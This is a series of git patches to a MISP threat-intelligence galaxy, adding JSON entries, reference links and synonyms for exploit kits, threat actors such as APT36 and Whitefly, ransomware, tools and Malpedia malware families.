From ce94cb845886f97c891074242e2dafe2a95ebc50 Mon Sep 17 00:00:00 2001 From: Kafeine Date: Sat, 22 Dec 2018 10:19:52 +0100 Subject: [PATCH 01/50] novidade,taurus --- clusters/exploit-kit.json | 29 +++++++++++++++++++++++++++-- 1 file changed, 27 insertions(+), 2 deletions(-) diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json index c6489c3..8c5db5c 100644 --- a/clusters/exploit-kit.json +++ b/clusters/exploit-kit.json @@ -97,7 +97,7 @@ "http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" ], - "status": "Retired - Last seen ", + "status": "", "synonyms": [ "Sednit RTF EK" ] @@ -120,6 +120,20 @@ "uuid": "74fb6a14-1279-4a5b-939a-76478d36d3e1", "value": "DNSChanger" }, + { + "description": "Novidade Exploit Kit is an exploit kit targeting Routers via the browser", + "meta": { + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/" + ], + "status": "Active", + "synonyms": [ + "DNSGhost" + ] + }, + "uuid": "88acc3b7-2cdd-4e7b-ad0b-2880ffa1eb6d", + "value": "Novidade" + }, { "description": "Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula", "meta": { @@ -201,6 +215,17 @@ "uuid": "b8be7af8-69a8-11e8-adc0-fa7ae01bbebc", "value": "VenomKit" }, + { + "description": "Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user \"badbullzvenom\". ", + "meta": { + "refs": [ + "" + ], + "status": "Active" + }, + "uuid": "63988ca2-46c8-4bda-be46-96a8670af357", + "value": "Taurus Builder" + }, { "description": "RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by \"vip\" customers and when RIG 3 was still in use.", "meta": { @@ -751,5 +776,5 @@ "value": "Unknown" } ], - "version": 13 + "version": 14 } From 5766cd68f8edb88f1c1c2e40c42c32defd8c36a0 Mon Sep 17 00:00:00 2001 From: Kafeine Date: Sat, 22 Dec 2018 11:51:40 +0100 Subject: [PATCH 02/50] zTDS --- clusters/tds.json | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/clusters/tds.json b/clusters/tds.json index 5865325..5b7658f 100644 --- a/clusters/tds.json +++ b/clusters/tds.json @@ -74,6 +74,19 @@ "uuid": "aa179c37-1a8a-4761-841a-cc940e19d7be", "value": "SimpleTDS" }, + { + "description": "zTDS is an open source TDS", + "meta": { + "refs": [ + "http://ztds.info/doku.php" + ], + "type": [ + "OpenSource" + ] + }, + "uuid": "7a84de25-545a-4220-b500-85b9219dd67d", + "value": "zTDS" + }, { "description": "BossTDS", "meta": { @@ -121,5 +134,5 @@ "value": "Orchid TDS" } ], - "version": 3 + "version": 4 } From 272ea3ba4aa648e43535f842c7b13df150209b27 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 28 Mar 2019 15:58:00 +0100 Subject: [PATCH 03/50] add ref for Ryuk and LockerGoga ransomwares --- clusters/ransomware.json | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 7c124ce..763b695 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -11717,7 +11717,8 @@ "https://www.crowdstrike.com/blog/wp-content/uploads/2019/01/RansomeNote-fig4.png" ], "refs": [ - "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf" ] }, "uuid": "f9464c80-b776-4f37-8682-ffde0cf8f718", @@ -11745,7 +11746,8 @@ "https://www.bleepstatic.com/images/news/u/1100723/Ransomware/LockerGoga-ransom-note.png" ], "refs": [ - "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf" ] }, "uuid": "1e19dae5-80c3-4358-abcd-2bf0ba4c76fe", @@ -11775,5 +11777,5 @@ "value": "Jokeroo" } ], - "version": 54 + "version": 55 } From 60e4a486a7719c89c1f82dcd17423f2a64c91c78 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Thu, 11 Apr 2019 23:55:51 +0530 Subject: [PATCH 04/50] adding additional resources for APT36 --- clusters/threat-actor.json | 2 ++ 1 file changed, 2 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2aab5fe..01ecbff 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6661,6 +6661,8 @@ "meta": { "refs": [ "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf" + "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf" + "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf" ], "synonyms": [ "APT 36", From 2fc914b2f94bc4ad3804bd15923b8c04fdf840f1 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Fri, 12 Apr 2019 01:06:50 +0530 Subject: [PATCH 05/50] Update threat-actor.json --- clusters/threat-actor.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 01ecbff..db3d03b 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6660,8 +6660,8 @@ "description": "FireEye details APT36 as a Pakistani espionage group that supports Pakistani military and diplomatic interests, targeting Indian military and government. Operations have been also observed in the US, Europe, and Central Asia. Uses social engineering emails, multiple open-source, and custom malware tools.", "meta": { "refs": [ - "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf" - "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf" + "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf", + "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf", "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf" ], "synonyms": [ From 7987c8f023acbb079a6ffe81a9a3aa8f1b2abf32 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Fri, 12 Apr 2019 01:56:12 +0530 Subject: [PATCH 06/50] Update threat-actor.json --- clusters/threat-actor.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index db3d03b..e0c5fe8 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2887,12 +2887,14 @@ "http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.amnesty.org/en/documents/asa33/8366/2018/en/", - "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/" + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/", + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [ "C-Major", "Transparent Tribe", - "Mythic Leopard" + "Mythic Leopard", + "ProjectM" ] }, "related": [ From 159225b6cf62a1c6478fd1a970317e21037b5388 Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Thu, 11 Apr 2019 22:29:49 +0200 Subject: [PATCH 07/50] Based on additional research, APT36 can actually be merged into Mythic Leopard --- clusters/threat-actor.json | 28 +++++++++------------------- 1 file changed, 9 insertions(+), 19 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index db3d03b..1d4dd3e 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2887,12 +2887,18 @@ "http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.amnesty.org/en/documents/asa33/8366/2018/en/", - "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/" + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/", + "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf", + "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf", + "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf" ], "synonyms": [ "C-Major", "Transparent Tribe", - "Mythic Leopard" + "Mythic Leopard", + "APT36", + "APT 36", + "TMP.Lapis" ] }, "related": [ @@ -6655,23 +6661,7 @@ }, "uuid": "401c30c7-4317-458a-9b0a-379a44d63457", "value": "Operation ShadowHammer" - }, - { - "description": "FireEye details APT36 as a Pakistani espionage group that supports Pakistani military and diplomatic interests, targeting Indian military and government. Operations have been also observed in the US, Europe, and Central Asia. Uses social engineering emails, multiple open-source, and custom malware tools.", - "meta": { - "refs": [ - "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf", - "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf", - "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf" - ], - "synonyms": [ - "APT 36", - "TMP.Lapis" - ] - }, - "uuid": "80fad97c-df3a-44ea-a127-cf29833b4946", - "value": "APT36" } ], - "version": 106 + "version": 107 } From 3256cca9e053ced12ce97113b9eb2618e5efdaf2 Mon Sep 17 00:00:00 2001 From: Bart Date: Fri, 12 Apr 2019 21:12:16 +0100 Subject: [PATCH 08/50] Add DoNot team references --- clusters/threat-actor.json | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index a9c864d..2be228e 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -5764,7 +5764,9 @@ "description": "In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization", "meta": { "refs": [ - "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/" + "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", + "https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia", + "https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/" ], "synonyms": [ "DoNot Team" From d98aefa18640094c269421de2b3b0f5ae7ad4ea2 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 17 Apr 2019 09:17:23 +0530 Subject: [PATCH 09/50] fixed the broken link --- clusters/threat-actor.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2be228e..8ec4896 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -757,7 +757,7 @@ "country": "CN", "refs": [ "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html", + "https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html", "https://www.cfr.org/interactive/cyber-operations/apt-30" ], "synonyms": [ From e1cab6868399970a986246b7ee6d20931e6a2947 Mon Sep 17 00:00:00 2001 From: Bart Date: Wed, 17 Apr 2019 12:27:18 +0100 Subject: [PATCH 10/50] Add Whitefly --- clusters/threat-actor.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 2be228e..280d277 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6665,7 +6665,17 @@ }, "uuid": "401c30c7-4317-458a-9b0a-379a44d63457", "value": "Operation ShadowHammer" - } + }, + { + "description": "In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.", + "meta": { + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore" + ] + }, + "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2", + "value": "Whitefly" + } ], "version": 107 } From ecc63cf1665c49705dac2644800f0122d06b5b1d Mon Sep 17 00:00:00 2001 From: Christophe Vandeplas Date: Wed, 17 Apr 2019 21:01:55 +0200 Subject: [PATCH 11/50] chg; [threat-actor] validate + version bump --- clusters/threat-actor.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index dfaf051..c84e46d 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6675,7 +6675,7 @@ }, "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2", "value": "Whitefly" - } + } ], - "version": 107 + "version": 108 } From 8ac7aec85cfef89c5073faba2038e3ea37edd1d9 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Fri, 19 Apr 2019 13:21:11 +0200 Subject: [PATCH 12/50] add Sea Turtle campaign --- clusters/threat-actor.json | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index c84e46d..d7aa608 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6675,6 +6675,16 @@ }, "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2", "value": "Whitefly" + }, + { + "description": " This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2019/04/seaturtle.html" + ] + }, + "uuid": "ce7bba52-5ae8-44ea-9979-68502d832ab7", + "value": "Sea Turtle" } ], "version": 108 From 292df2360a10dca63dd427bae6250802d0a6dbd8 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Mon, 22 Apr 2019 11:05:21 +0530 Subject: [PATCH 13/50] more report on APT36 --- clusters/threat-actor.json | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index d7aa608..24c73ed 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2891,7 +2891,9 @@ "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe", "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf", "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf", - "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf" + "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf", + "https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials", + "https://s.tencent.com/research/report/669.html" ], "synonyms": [ "C-Major", From 088e7477a627fdea40b905bd050ec80b28445232 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 24 Apr 2019 11:40:06 +0200 Subject: [PATCH 14/50] chg: [tool] Karkoff tool added --- clusters/tool.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/tool.json b/clusters/tool.json index 17a5a7c..f2df2d8 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7630,7 +7630,17 @@ }, "uuid": "e1ca79ea-5628-4266-bb36-3892c7126ef4", "value": "Brushaloader" + }, + { + "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908", + "value": "Karkoff", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ] + }, + "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff." } ], - "version": 116 + "version": 117 } From 094f0e0684efa8857944aed6e70a29b33b5065d8 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 24 Apr 2019 12:58:49 +0200 Subject: [PATCH 15/50] chg: [tool] jq all the things --- clusters/tool.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/clusters/tool.json b/clusters/tool.json index f2df2d8..77d4645 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7632,14 +7632,14 @@ "value": "Brushaloader" }, { - "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908", - "value": "Karkoff", + "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff.", "meta": { "refs": [ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ] }, - "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff." + "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908", + "value": "Karkoff" } ], "version": 117 From 2405f1c59e1717659a9f62a262d015f463c690e2 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sat, 27 Apr 2019 09:33:55 +0200 Subject: [PATCH 16/50] chg: [tool] Cowboy and KimJongRAT (Sorry Paul, we forgot ;-) ref: https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/ --- clusters/tool.json | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/clusters/tool.json b/clusters/tool.json index 77d4645..8493546 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7640,7 +7640,27 @@ }, "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908", "value": "Karkoff" + }, + { + "description": "We conclude that this RAT/stealeris efficient and was also really interesting to analyse.Furthermore, the creator made effortsto look Korean, for example the author of the .pdf file is Kim Song Chol. He is the brother of Kim Jong-un, the leader of North Korea. We identified that the author of a variant of this stealer is another brother of Kim Jong-un. Maybe the author named every variant withthe name of each brother. After some searches using Google, we identified anold variant of this malware here: http://contagiodump.blogspot.ca/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html. The code of the malware available on the blog is closeto our case but with fewer features. In 2010, the password of the Gmail account was futurekimkim. Three years ago, the author was already fixatedon the Kim family...The language of the resource stored in the .dll file is Korean (LANG_KOREAN). The owner of the gmail mailbox is laoshi135.zhangand the secret question of this account is in Korean too.We don’t know if the malware truly comesfrom Korea.However, thanks to these factors, we decided to name this sample KimJongRAT/Stealer.", + "meta": { + "refs": [ + "https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf" + ] + }, + "uuid": "3160f772-d458-4bff-970c-1c0431238803", + "value": "KimJongRAT" + }, + { + "description": "Based on our research, it appears the malware author calls the encoded secondary payload “Cowboy” regardless of what malware family is delivered.", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/" + ] + }, + "uuid": "50baa4dc-0667-4b47-b4aa-374a2743f409", + "value": "Cowboy" } ], - "version": 117 + "version": 118 } From 915b673b7af17037489f0879ee1e794fad2094fc Mon Sep 17 00:00:00 2001 From: Kafeine Date: Sun, 28 Apr 2019 12:24:48 +0200 Subject: [PATCH 17/50] += Spelevo --- clusters/exploit-kit.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json index 8c5db5c..a2b249f 100644 --- a/clusters/exploit-kit.json +++ b/clusters/exploit-kit.json @@ -245,6 +245,17 @@ }, "uuid": "0545e5c0-ed0d-4a02-a69d-31e9e2b31e8a", "value": "RIG" + }, + { + "description": "Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK", + "meta": { + "refs": [ + "https://twitter.com/kafeine/status/1103649040800145409" + ], + "status": "Active" + }, + "uuid": "c880991f-1c17-4bf2-8955-50309364e358", + "value": "Spelevo" }, { "description": "Sednit EK is the exploit kit used by APT28", From f9a030ce54716952caffcbd23ae0be1244faaac7 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 28 Apr 2019 19:12:06 +0200 Subject: [PATCH 18/50] chg: [exploit-kit] jq all the things --- clusters/exploit-kit.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json index a744fd1..197d7bb 100644 --- a/clusters/exploit-kit.json +++ b/clusters/exploit-kit.json @@ -246,7 +246,7 @@ "uuid": "0545e5c0-ed0d-4a02-a69d-31e9e2b31e8a", "value": "RIG" }, - { + { "description": "Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK", "meta": { "refs": [ From 57735a5b5c2c6511d7e8eaa791022d2fe13171dd Mon Sep 17 00:00:00 2001 From: Rintaro KOIKE Date: Tue, 30 Apr 2019 20:41:12 +0900 Subject: [PATCH 19/50] chg: [malpedia] updated to the latest version Ref: https://malpedia.caad.fkie.fraunhofer.de/api/get/misp --- clusters/malpedia.json | 2789 ++++++++++++++++++++++++++++++++++++---- 1 file changed, 2518 insertions(+), 271 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 0ede545..28bd70b 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -15,6 +15,21 @@ "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", + "https://www.us-cert.gov/ncas/alerts/TA18-275A", + "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", + "https://github.com/fboldewin/FastCashMalwareDissected/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", + "value": "FastCash" + }, { "description": "", "meta": { @@ -44,6 +59,32 @@ "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", + "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", + "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", + "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", + "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", + "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", + "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", + "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", + "https://pentest.blog/n-ways-to-unpack-mobile-malware/", + "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", + "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", + "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html" + ], + "synonyms": [ + "BankBot" + ], + "type": [] + }, + "uuid": "85975621-5126-40cb-8083-55cbfa75121b", + "value": "Anubis" + }, { "description": "", "meta": { @@ -86,23 +127,6 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html" - ], - "synonyms": [], - "type": [] - }, - "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot" - }, { "description": "", "meta": { @@ -143,13 +167,28 @@ "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", + "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2", + "value": "Chamois" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", - "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" + "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html", + "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf" ], "synonyms": [], "type": [] @@ -190,6 +229,34 @@ "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper", + "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html", + "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", + "https://news.drweb.com/show?lng=en&i=12739" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", + "value": "Clipper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot", + "https://twitter.com/LukasStefanko/status/1102937833071935491" + ], + "synonyms": [], + "type": [] + }, + "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1", + "value": "CometBot" + }, { "description": "", "meta": { @@ -270,6 +337,35 @@ "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", + "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", + "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" + ], + "synonyms": [], + "type": [] + }, + "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8", + "value": "Exodus" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab", + "value": "FakeSpy" + }, { "description": "", "meta": { @@ -343,6 +439,19 @@ "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", "value": "GlanceLove" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e111fff8-c73c-4069-b804-2d3732653481", + "value": "GoldenRAT" + }, { "description": 